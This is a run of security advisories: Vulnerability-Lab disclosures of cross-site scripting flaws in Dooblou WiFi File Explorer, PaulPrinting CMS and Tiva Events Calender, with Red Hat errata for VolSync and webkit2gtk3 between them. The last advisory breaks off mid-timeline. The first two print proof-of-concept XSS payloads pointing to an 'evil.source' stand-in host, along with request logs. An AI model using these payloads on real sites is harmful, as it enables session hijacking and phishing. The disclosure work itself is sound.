Dooblou WiFi File Explorer version 1.13.3 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Dooblou WiFi File Explorer 1.13.3 - Multiple VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2317Release Date:=============2023-07-04Vulnerability Laboratory ID (VL-ID):====================================2317Common Vulnerability Scoring System:====================================5.1Vulnerability Class:====================MultipleCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.Affected Product(s):====================Product Owner: dooblouProduct: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)Vulnerability Disclosure Timeline:==================================2022-01-19: Researcher Notification & Coordination (Security Researcher)2022-01-20: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-04: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-applicationrequests from the application-side.The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validatedand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized toperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of thefront- & backend of the wifi explorer.Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicioussource and non-persistent manipulation of affected application modules.Proof of Concept (PoC):=======================The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEXVulnerable Sources: Execution Points<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><tdstyle="vertical-align:top;"><table style="background-color: #FFA81E;background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" width="700"cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><spanclass="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image:url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><span class="doob_medium_text">Cannot find file ordirectory! /storage/emulated/0/Download/<a href="https://evil.source"  onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURNINDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<ahref="/">>>&nbsp;Back ToFiles&nbsp;>></a></span></span><br></td></tr></tbody></table><br>-<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I-<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source"  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are  you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action','13&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy","/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source"  onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>---PoC Session Logs ---http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xml-http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0Upgrade-Insecure-Requests: 1GET: HTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html-http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source"  onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xmlSecurity Risk:==============The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting

Red Hat Security Advisory 2023-4204-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. After deploying the VolSync operator, it can create and maintain copies of your persistent data.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.7.3 security fixes and enhancements  
Advisory ID:       RHSA-2023:4204-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4204  
Issue date:        2023-07-18  
CVE Names:         CVE-2020-24736 CVE-2023-1667 CVE-2023-2283   
                   CVE-2023-3089 CVE-2023-24329 CVE-2023-26604   
=====================================================================

1. Summary:

VolSync v0.7.3 enhancements and security fixes

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/business_continuity/business-cont-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync  
container images.

Security fix(es):  
* CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.8/html/business_continuity/business-cont-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

ACM-6336 - VolSync v0.7.3

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkt2keAAoJENzjgjWX9erEKL0P/24na+zumgR7Ee/Y9VksDnX9  
7TNKrwdNj4sRsOh8+QVWpcHInG/uLi3lWt7n1Xp6mOx6lG/DoO9AmiqiKFDMgCt+  
kP8aakLQ+bKM/VdibJSBrB1wu+3DAJWVy7+bw2V+ivw72vBoIoz0wB5zn6Pz8SXG  
I2/oWUTJM5L3p4Vk/s7mFyyp/JDbElTsZLTDPWG28Yh9YTlZoLVznymbNjlUZwj4  
8zS7+EMRwje7dQKnMBOWnJvCN/wASSkBsUxZVFRYIpNYdSUSoT42sPlcoqE0dGue  
nINsyBDZv7TNz/abUSO35gVCNwZZj0DLZ+thktzrHl6AYWKr7W5v6NhBEtG2quFL  
74q4Apg3x/rl9421SOMdrgOvW/MWDA1foFNP/5K5fCWxBq30QSvCpgRKpIpAZ0er  
rJOVLNbin+gphFd52mJV7dJo2BK6EzIoIv7Plgurdhyl2sugYVDEmxUotWF844eX  
En3O2Ho/TtSDuR9CGY7wA2oxB8aPUOdbsCnKLISIl+s+uaw/2GeIMvx/MD9cepVs  
aLOy+unl67NzNW7mpMcvrsEJi/mxp6hRVQwVy95LSMqw0mRxHOFOC31qZ2rD5h4L  
GR7j0X7KKX7pbCZwhNFPw+WoQRlZL1aqK3GfV8lMZOLqSpaY7qWBfWe9DIik/gEO  
o9BxEjx9kmvJ+ImLK1j/  
=137U  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4204-01

PaulPrinting CMS suffers from a cross site scripting vulnerability.

Document Title:  
===============  
PaulPrinting CMS - (Search Delivery) Cross Site Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2286

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2286

Common Vulnerability Scoring System:  
====================================  
5.2

Vulnerability Class:  
====================  
Cross Site Scripting - Non Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.

Vulnerability Disclosure Timeline:  
==================================  
2022-08-25: Researcher Notification & Coordination (Security Researcher)  
2022-08-26: Vendor Notification (Security Department)  
2022-**-**: Vendor Response/Feedback (Security Department)  
2022-**-**: Vendor Fix/Patch (Service Developer Team)  
2022-**-**: Security Acknowledgements (Security Department)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Medium User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.  
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter  
affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side  
script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects  
to malicious source and non-persistent manipulation of affected application modules.

Request Method(s):  
[+] GET

Vulnerable Module(s):  
[+] /account/delivery

Vulnerable Input(s):  
[+] Search

Vulnerable Parameter(s):  
[+] q

Affected Module(s):  
[+] /account/delivery  
[+] Delivery Contacts

Proof of Concept (PoC):  
=======================  
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example  
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

--- PoC Session Logs (GET) ---  
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>  
Host: codeawesome.in  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Connection: keep-alive  
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;  
-  
GET: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33

Vulnerable Source:  (Search - delivery?q=)  
<div class="col-lg-8">  
<a href="https://codeawesome.in/printing/account/delivery"  class="btn btn-primary mt-4 mb-2 float-right">  
<i class="fa fa-fw fa-plus"></i>  
</a>  
<form class="form-inline mt-4 mb-2" method="get">  
<div class="input-group mb-3 mr-2">  
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">  
<div class="input-group-append">  
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>  
</div></div>

Security Risk:  
==============  
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

PaulPrinting CMS Cross Site Scripting

Red Hat Security Advisory 2023-4201-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:4201-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4201  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-32435 CVE-2023-32439   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-32435)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2023-32439)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2218626 - CVE-2023-32435 webkitgtk: memory corruption issue leading to arbitrary code execution  
2218640 - CVE-2023-32439 webkitgtk: type confusion issue leading to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.38.5-1.el9_2.3.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32435  
https://access.redhat.com/security/cve/CVE-2023-32439  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBrAAoJENzjgjWX9erEiakP/0rpWz6YOCkcXbhxrw/eVo/+  
kpHQ96DXZZxFueZM9M3t97uQCEKQbSx3I4SYvhAntlVI1Nyd+3NhJPBUSQCJ5Ikh  
0PfSNevk2D58IxFaqVEDB4nBtuykcxoVxAucyurmpWzn232q/zUM+vu9J87WeL8r  
tx6hwHpRaL7bQX9nYj2T6bNvco7A8eQnuecDRIPY9UmrKw6CR1VyzT/8rKCNHy4n  
ze02Es4ubvoW91G/UxyghgcSZ9qD+VViaZMKDQ0h56Jc78jPMnxorKqnxnwiQLuM  
6tTloitKIc5hSAIEGXUooAaUJEHO2zsi+H0mDWHwigz6pPkSaQ7vAOnwQZGJp5dm  
w9WYM5qHrIFUEIPdGHuK84Qp0vCcmJ5PHowmS42m5R13Iv9pnGOdAbl9U56F9UMM  
3ygWOVy1Lm3KXxE96CO65ljPdpnCXlj4+ldRwPNM65kBvuRVi+RsR+MPvBukvdP+  
XL4QoXdaw0MRRlqHheFgvhkVIGLAXFuhy6K1KoCnnd2D1n0L5gPa4JKMqPdYVwtj  
SzI2cdz/2qCXQ8ME/iYSELncO9QUW7D73ny1VYzfVEktniDOpcbk64r8Z0enfyvm  
MtktJfrO1byyynN7BSt3bfTTpJjyBRWLF/NjTZPXNQFWpsm9rraV5xF2DKHKGSOX  
jfKJdTzL1l7dZ7usO+Eh  
=eUkv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4201-01

Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

Document Title:  
===============  
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:  
=============  
2023-07-05

Vulnerability Laboratory ID (VL-ID):  
====================================  
2276

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,  
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of  
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):  
====================  
tiva_theme  
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-04-03: Researcher Notification & Coordination (Security Researcher)  
2021-04-04: Vendor Notification 1 (Security Department)  
2021-06-24: Vendor Notification 2 (Security Department)  
2021-07-13: Vendor Notification 3 (Security Department)  
****-**-**: Vendor Response/Feedback (Security Department)  
****-**-**: Vendor Fix/Patch (Service Developer Team)  
